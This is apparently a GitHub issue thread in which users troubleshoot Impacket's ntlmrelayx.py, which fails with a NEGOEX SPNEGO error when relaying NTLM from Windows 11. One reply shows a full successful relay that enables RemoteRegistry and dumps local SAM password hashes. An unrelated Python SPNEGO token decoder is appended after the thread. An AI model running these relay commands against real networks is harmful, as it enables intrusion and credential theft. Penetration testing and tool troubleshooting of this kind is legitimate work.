fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com

Issues relaying NTLM Authentication from Win11 - ntlmrelayx.py #1376

Open bdrogja opened 2 years ago

bdrogja commented 2 years ago

Configuration

impacket version: v0.10.0
Python version: 3.10.4
Target OS: Kali 2022.2
Victim OS: Win11

Debug Output With Command String

[*] SMBD-Thread-3885 (process_request_thread): Connection from CORP/USER@10.1.12.83 controlled, attacking target smb://10.1.12.83
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'

Additional context

This error appears when I try to relay the user from a Win11 victim. It works on Win10 as expected. Does somebody know what this error exactly means?

NtAlexio2 commented 2 years ago

There is no problem with default configurations:

┌──(kali㉿kali)-[~/Desktop/impacket/examples]
└─$ python ntlmrelayx.py -smb2support -t smb://192.168.129,12
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server

[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.129,11, attacking target smb://192.168.129,12
[*] Authenticating against smb://192.168.129,12 as CORP/ADMIN SUCCEED
[*] SMBD-Thread-7: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-8: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-9: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-10: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x70fe2b7e922573b298f6ec9d8036259d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5b83245236c8541b4d417fa214602fa8:::
[*] Done dumping SAM hashes for host: 192.168.129,12
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Please share more details, like this:

And the most important one: Wireshark capture .pcap file! For this, follow these steps:

Attach the capture file and specify the details of the scenario, to get it solved!

rockabillycat666 commented 1 year ago

Having the same issue as @bdrogja on a Windows 10 machine, related to NEGOEX - SPNEGO Extended Negotiation Security Mechanism:

```
└─$ ntlmrelayx.py -tf target.txt -smb2support
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-4 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-5 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-6 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-7 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-8 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
[-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'
[*] SMBD-Thread-9 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11
```

I believe this has to do with Kerberos authentication and not NTLM.
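
Added example, not part of the thread and not Impacket's code: the MechType named in the log message is one of the mechanism OIDs a client lists in the mechTypes field of its SPNEGO NegTokenInit. The sketch below decodes that list from a security blob so the offer can be inspected when reviewing a capture; the function names and the sample token are constructed for illustration.

```python
KNOWN = {  # mechanism OIDs commonly seen in Windows SPNEGO offers
    "1.3.6.1.4.1.311.2.2.30": "NEGOEX",
    "1.3.6.1.4.1.311.2.2.10": "NTLMSSP",
    "1.2.840.113554.1.2.2": "Kerberos 5",
    "1.2.840.48018.1.2.2": "MS Kerberos 5",
}

def read_tlv(buf, pos, want):  # -> (value, next_pos); raises on tag mismatch
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if tag != want:
        raise ValueError(f"expected tag {want:#04x}, got {tag:#04x}")
    if length & 0x80:  # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated value")
    return buf[pos:pos + length], pos + length

def decode_oid(body):
    arcs, value = [], 0
    for byte in body:  # base-128; high bit marks a continuation byte
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    if not arcs:
        raise ValueError("empty OID")
    first = min(arcs[0] // 40, 2)
    return ".".join(map(str, [first, arcs[0] - 40 * first] + arcs[1:]))

def mech_types(token):  # -> [(dotted_oid, name)] from a SPNEGO NegTokenInit
    gss, _ = read_tlv(token, 0, 0x60)     # [APPLICATION 0] GSS-API initial token
    oid, pos = read_tlv(gss, 0, 0x06)
    if decode_oid(oid) != "1.3.6.1.5.5.2":
        raise ValueError("not a SPNEGO token")
    choice, _ = read_tlv(gss, pos, 0xA0)  # [0] NegTokenInit
    init, _ = read_tlv(choice, 0, 0x30)
    field, _ = read_tlv(init, 0, 0xA0)    # [0] mechTypes
    mechs, _ = read_tlv(field, 0, 0x30)   # SEQUENCE OF OID, in preference order
    out, pos = [], 0
    while pos < len(mechs):
        oid, pos = read_tlv(mechs, pos, 0x06)
        out.append((decode_oid(oid), KNOWN.get(decode_oid(oid), "unknown")))
    return out

# Constructed sample (not from a capture): offers NEGOEX, MS Kerberos 5, NTLMSSP.
SAMPLE = bytes.fromhex(
    "6033 06062b0601050502 a029 3027 a025 3023 060a2b06010401823702021e"
    " 06092a864882f712010202 060a2b06010401823702020a")
```

Calling `mech_types(SAMPLE)` returns the offered mechanisms in the order the client listed them.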